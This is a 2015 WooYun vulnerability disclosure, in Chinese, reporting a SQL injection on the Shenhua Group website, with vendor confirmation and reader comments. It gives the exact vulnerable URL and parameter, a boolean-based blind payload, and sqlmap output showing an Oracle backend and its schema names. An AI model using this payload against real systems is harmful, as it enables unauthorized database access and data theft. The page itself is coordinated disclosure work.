当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092868

漏洞标题:神华集团主站存在SQL注入

相关厂商:神华集团

漏洞作者: 疏懒

提交时间:2015-01-20 13:55

修复时间:2015-03-06 13:56

公开时间:2015-03-06 13:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向核心白帽子及相关领域专家公开
2015-02-09: 细节向普通白帽子公开
2015-02-19: 细节向实习白帽子公开
2015-03-06: 细节向公众公开

简要描述:

RT

详细说明:

注入点

http://www.shenhuagroup.com.cn/cs/Satellite?c=sh_news_p&cid=1382685035004&pagename=shenhua%2Fsh_news_p%2Fsh_layout%2FgoShenhua%2FpictureLayout&ccid=1385712590227


参数ccid,单引号测试

QQ截图20150120131600.jpg


漏洞证明:

sqlmap identified the following injection points with a total of 97 HTTP(s) requ
ests:
---
Place: GET
Parameter: ccid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c=sh_news_p&cid=1382685035004&pagename=shenhua/sh_news_p/sh_layout/
goShenhua/pictureLayout&ccid=1385712590227 AND 2495=2495
---
[12:55:55] [INFO] testing MySQL
[12:56:00] [WARNING] the back-end DBMS is not MySQL
[12:56:00] [INFO] testing Oracle
[12:56:03] [INFO] confirming Oracle
[12:56:05] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, Apache 2.4.7, JSP, JSP 2.1
back-end DBMS: Oracle
[12:56:05] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[12:56:05] [INFO] fetching database (schema) names
[12:56:05] [INFO] fetching number of databases
available databases [6]:
[*] CTXSYS
[*] DELIVERYUSER
[*] EXFSYS
[*] SYS
[*] SYSTEM
[*] XDB


涉及到6个数据库。。。

修复方案:

过滤

版权声明:转载请注明来源 疏懒@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-20 15:09

厂商回复:

处置中。。。。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-23 09:28 | 冰@封 ( 路人 | Rank:4 漏洞数:2 | 凄凄黑夜间,残影舞指间。)

    主站?www.shenhuagroup.com.cn 这个?

  2. 2015-01-23 09:53 | 疏懒 ( 普通白帽子 | Rank:359 漏洞数:31 | 不能尽如人意,但求知足常乐~!)

    @冰@封 恩。。

  3. 2015-01-31 09:21 | U神 ( 核心白帽子 | Rank:1285 漏洞数:87 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @疏懒 有没有绕waf, unable to connect to the target URL or proxy. sqlmap is going to retry the request